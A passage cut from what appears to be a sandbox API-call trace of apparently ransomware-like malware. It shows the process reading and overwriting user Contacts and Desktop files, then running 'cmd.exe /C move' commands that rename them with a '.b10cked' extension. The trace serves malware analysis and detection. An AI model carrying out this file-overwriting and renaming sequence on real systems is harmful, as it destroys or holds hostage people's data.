0xb [0219.313] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.374] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4f3 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4f3 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.374] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x278, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x278, lpOverlapped=0x0) returned 1 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.374] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x278, lpOverlapped=0x0) returned 1 [0219.374] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=-632, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27b [0219.374] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x278, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x278, lpOverlapped=0x0) returned 1 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-632, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27b [0219.374] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x278, lpOverlapped=0x0) returned 1 [0219.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uosjfl sidvllie.contact", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0219.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uosjfl sidvllie.contact", cchWideChar=23, lpMultiByteStr=0x13286a4, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uosjfl sidvllie.contact", lpUsedDefaultChar=0x0) returned 23 [0219.378] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4f3 [0219.378] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.378] CloseHandle (hObject=0x1b4) returned 1 [0219.379] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON") 
returned 0x26 [0219.379] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0219.379] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xf14, dwThreadId=0x8fc)) returned 1 [0219.384] CloseHandle (hObject=0x120) returned 1 [0219.384] CloseHandle (hObject=0x1b4) returned 1 [0219.384] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.384] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.384] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 2 [0219.384] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.384] ReleaseMutex (hMutex=0xf8) returned 1 [0219.384] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.384] 
ReleaseMutex (hMutex=0xf8) returned 1 [0219.384] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.384] ReleaseMutex (hMutex=0xf8) returned 1 [0219.384] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.384] ReleaseMutex (hMutex=0xf8) returned 1 [0219.384] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png" (normalized: "c:\\users\\eebsym5\\desktop\\59niyoz1klx-.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.384] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.384] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27617379713) returned 1 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) 
returned 0x17ac1 [0219.386] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x17fa9 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x17fa9 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.387] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xbfd3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xbfd3, lpOverlapped=0x0) returned 1 
[0219.388] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.388] WriteFile (in: hFile=0x1b4, lpBuffer=0x124bd78*, nNumberOfBytesToWrite=0xbfd3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x124bd78*, lpNumberOfBytesWritten=0x12ec1c*=0xbfd3, lpOverlapped=0x0) returned 1 [0219.388] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49107, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbfd6 [0219.388] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xbfd3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xbfd3, lpOverlapped=0x0) returned 1 [0219.388] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49107, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbfd6 [0219.388] WriteFile (in: hFile=0x1b4, lpBuffer=0x124bd78*, nNumberOfBytesToWrite=0xbfd3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x124bd78*, lpNumberOfBytesWritten=0x12ec1c*=0xbfd3, lpOverlapped=0x0) returned 1 [0219.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="59nIYoZ1Klx-.png", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0219.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="59nIYoZ1Klx-.png", cchWideChar=16, lpMultiByteStr=0x13286a4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="59nIYoZ1Klx-.png", lpUsedDefaultChar=0x0) returned 16 [0219.392] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x17fa9 [0219.392] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, 
nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.393] CloseHandle (hObject=0x1b4) returned 1 [0219.394] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG") returned 0x25 [0219.394] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.394] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xc78, dwThreadId=0xd30)) returned 1 [0219.398] CloseHandle (hObject=0x120) returned 1 [0219.399] CloseHandle (hObject=0x1b4) returned 1 [0219.399] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.399] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.399] 
CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.399] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.399] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.399] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.399] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.399] ReleaseMutex (hMutex=0xf8) returned 1 [0219.399] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.399] ReleaseMutex (hMutex=0xf8) returned 1 [0219.399] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.399] ReleaseMutex (hMutex=0xf8) returned 1 [0219.399] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.399] ReleaseMutex (hMutex=0xf8) returned 1 [0219.399] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.399] 
QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27618849897) returned 1 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 